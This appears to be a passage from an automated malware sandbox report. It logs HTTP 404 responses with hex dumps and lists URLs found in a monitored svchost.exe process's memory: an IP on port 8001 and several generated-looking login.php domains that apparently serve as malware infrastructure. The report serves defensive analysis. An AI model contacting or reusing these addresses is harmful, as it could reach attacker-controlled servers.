--><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:25 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 38 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:27 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 38 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:48:36 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:48:37 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:48:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:48:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html
      Source: svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com
      Source: svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0
      Source: svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcom
      Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/
      Source: login[4].htm.1.drString found in binary or memory: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&
      Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyciz.com/login.php
      Source: svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php
      Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php/
      Source: svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php3
      Source: svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.phpMy
